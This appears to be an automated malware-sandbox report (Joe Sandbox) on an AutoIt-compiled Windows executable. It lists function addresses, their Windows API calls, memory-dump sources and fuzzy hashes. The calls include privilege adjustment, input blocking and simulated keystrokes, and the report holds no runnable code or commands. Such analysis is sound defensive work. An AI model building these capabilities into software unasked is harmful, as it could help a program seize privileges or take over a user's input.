                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6b25d54619aaca6c33379213179f7d6f29914714f0115aec1239a5aca6677bc
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F031D77490122C9BCB61DF64D98879CBBB8AF18710F5041EAE40CA6251EB349F859F44
                                                                                                                                                                                                                                                                                                        Function 01012010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00FD09D8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00FD09F5
                                                                                                                                                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0101205A
                                                                                                                                                                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01012087
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 01012097
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 577356006-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: c84213181e52b45631985aaea6afe1fb9b64b925599e6d571cc0820ad45392ba
                                                                                                                                                                                                                                                                                                        • Instruction ID: c3feb6851e7beee1c0fdd5529c44ac27b01331456641b59c7d8695f5bf35a78f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c84213181e52b45631985aaea6afe1fb9b64b925599e6d571cc0820ad45392ba
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C811BFB1400204AFD728AF54DCC6E6BBBF9EB04750B24851EF48653241DB75FC41CB20
                                                                                                                                                                                                                                                                                                        Function 00FD5058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,00FD502E,?,010798D8,0000000C,00FD5185,?,00000002,00000000), ref: 00FD5079
                                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00FD502E,?,010798D8,0000000C,00FD5185,?,00000002,00000000), ref: 00FD5080
                                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00FD5092
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8225d9f802335e9a8d1970c63d0c4831bb618598e77c0b698614cfacc28e8696
                                                                                                                                                                                                                                                                                                        • Instruction ID: ca4ad1997aa1b51d5da59366211240ec02acdbc94a64034c3e4bb609c1b485ca
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8225d9f802335e9a8d1970c63d0c4831bb618598e77c0b698614cfacc28e8696
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EEE04F71400544AFCF216F90DE4CD483F6AEF20792F044015F8454B221DB3ADD41DBC0
                                                                                                                                                                                                                                                                                                        Function 0100E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 0100E664
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: NameUser
                                                                                                                                                                                                                                                                                                        • String ID: X64
                                                                                                                                                                                                                                                                                                        • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                                                        • Opcode ID: 10d71232fb3d20c84d68f05ca93ad477fa561426a9bb159cc306ddb4665b2245
                                                                                                                                                                                                                                                                                                        • Instruction ID: 81c6243c60f61de88ee8c74fded5580688124dde67ff3b56c88c01fe785719ee
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10d71232fb3d20c84d68f05ca93ad477fa561426a9bb159cc306ddb4665b2245
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41D0C9F980111DEBDB94CA90EDC8EDD737CBB04344F000A55F146A2040DB34A6488B10
                                                                                                                                                                                                                                                                                                        Function 010241FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,010352EE,?,?,00000035,?), ref: 01024229
                                                                                                                                                                                                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,010352EE,?,?,00000035,?), ref: 01024239
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3f6557fdcc594b3e21cd10c22317f502de047078716aeeb78f705756b078d492
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1d07e0cf5473800fb479dc54184f650c5e3a62bda69a34bc7915a91a1f169984
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f6557fdcc594b3e21cd10c22317f502de047078716aeeb78f705756b078d492
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23F0E5747002286AE7202AA69D4DFEB3AADEFC5761F0002B5F505D2185D9749904C7B0
                                                                                                                                                                                                                                                                                                        Function 0101BBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0101BC24
                                                                                                                                                                                                                                                                                                        • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 0101BC37
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3536248340-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: f9275950d28f105c0568582d9cec6e47d362bcba89136c26d9dcbcc207344d45
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8ff0969686077a8ca039da7d6cf4e2d6ded34db269ac6f7bd58f71eeb8fc2e92
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9275950d28f105c0568582d9cec6e47d362bcba89136c26d9dcbcc207344d45
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91F06D7490024DABDB019FA4C805BBE7FB0FF04309F008049F991A5191D77D8201CF94
                                                                                                                                                                                                                                                                                                        Function 01011A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01011B48), ref: 01011A20
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,01011B48), ref: 01011A35
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 81990902-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: e76fd118f50c31e96f15b9af5566e1b22940bea7e9a2a33a7647975dc0f6fa1c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 99a8745295c252bfefaaae8c41f75db41da02f2ad40b9b6b587ef0b1b8e69462
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e76fd118f50c31e96f15b9af5566e1b22940bea7e9a2a33a7647975dc0f6fa1c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87E01A72014610BFE7252B60EC05F727BE9EB04311F14881EB5A580474DA66AC90EB10
                                                                                                                                                                                                                                                                                                        Function 0102F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • BlockInput.USER32(00000001), ref: 0102F51A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: BlockInput
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: d7a45a9547204597af3edb33fb4989bac4bc71bf9c3b91f7cb4faa2fa0d7db7a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7bce5726f99608fedd6655ab0d3066797c03f12be9b84de35b4b7bf8507aea04
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7a45a9547204597af3edb33fb4989bac4bc71bf9c3b91f7cb4faa2fa0d7db7a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3E048352102155FD7109F6AD844E9BF7E8AFA47A1F008415F98EC7351D674F940CBA0
                                                                                                                                                                                                                                                                                                        Function 00FD0D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00FD075E), ref: 00FD0D4A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: a3acf6b335560eb79a9626078119a7cd4ae48614d556f04d6dfd025afbeeba05
                                                                                                                                                                                                                                                                                                        • Instruction ID: 26845d996521aa71beca9af031364fc59bd7c2fc775f042c51317cf8155199e3
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3acf6b335560eb79a9626078119a7cd4ae48614d556f04d6dfd025afbeeba05
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                                        Function 0103353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0103358D
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 010335A0
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32 ref: 010335AF
                                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 010335CA
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 010335D1
                                                                                                                                                                                                                                                                                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 01033700
                                                                                                                                                                                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 0103370E
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01033755
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 01033761
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0103379D
                                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 010337BF
                                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 010337D2
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 010337DD
                                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 010337E6
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 010337F5
                                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 010337FE
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01033805
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 01033810
                                                                                                                                                                                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01033822
                                                                                                                                                                                                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,01050C04,00000000), ref: 01033838
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 01033848
                                                                                                                                                                                                                                                                                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 0103386E
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 0103388D
                                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 010338AF
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01033A9C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                                        • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                                                        • Opcode ID: b65112e5b2d1e332c283e046790b55d2d0afe77f7fff703dbbcbca1a81822e5b
                                                                                                                                                                                                                                                                                                        • Instruction ID: 59e97803400c1c76b135e1a9311d0214853cd3b8ef2f27c785ce6e379f12be8b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b65112e5b2d1e332c283e046790b55d2d0afe77f7fff703dbbcbca1a81822e5b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 04028F75900205EFDB24DFA4CD89EAE7BB9FB88710F048158F995AB294C739E901CF60
                                                                                                                                                                                                                                                                                                        Function 01047B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 01047B67
                                                                                                                                                                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 01047B98
                                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 01047BA4
                                                                                                                                                                                                                                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 01047BBE
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 01047BCD
                                                                                                                                                                                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 01047BF8
                                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(00000010), ref: 01047C00
                                                                                                                                                                                                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 01047C07
                                                                                                                                                                                                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 01047C16
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 01047C1D
                                                                                                                                                                                                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 01047C68
                                                                                                                                                                                                                                                                                                        • FillRect.USER32(?,?,?), ref: 01047C9A
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 01047CBC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: GetSysColor.USER32(00000012), ref: 01047E5B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: SetTextColor.GDI32(?,01047B2D), ref: 01047E5F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: GetSysColorBrush.USER32(0000000F), ref: 01047E75
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: GetSysColor.USER32(0000000F), ref: 01047E80
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: GetSysColor.USER32(00000011), ref: 01047E9D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 01047EAB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: SelectObject.GDI32(?,00000000), ref: 01047EBC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: SetBkColor.GDI32(?,?), ref: 01047EC5
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: SelectObject.GDI32(?,?), ref: 01047ED2
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: InflateRect.USER32(?,000000FF,000000FF), ref: 01047EF1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 01047F08
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01047E22: GetWindowLongW.USER32(?,000000F0), ref: 01047F15
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: efa5a1eb426b791f90e1dd66416a78dbe0554bae536d114946dbc860fd93362c
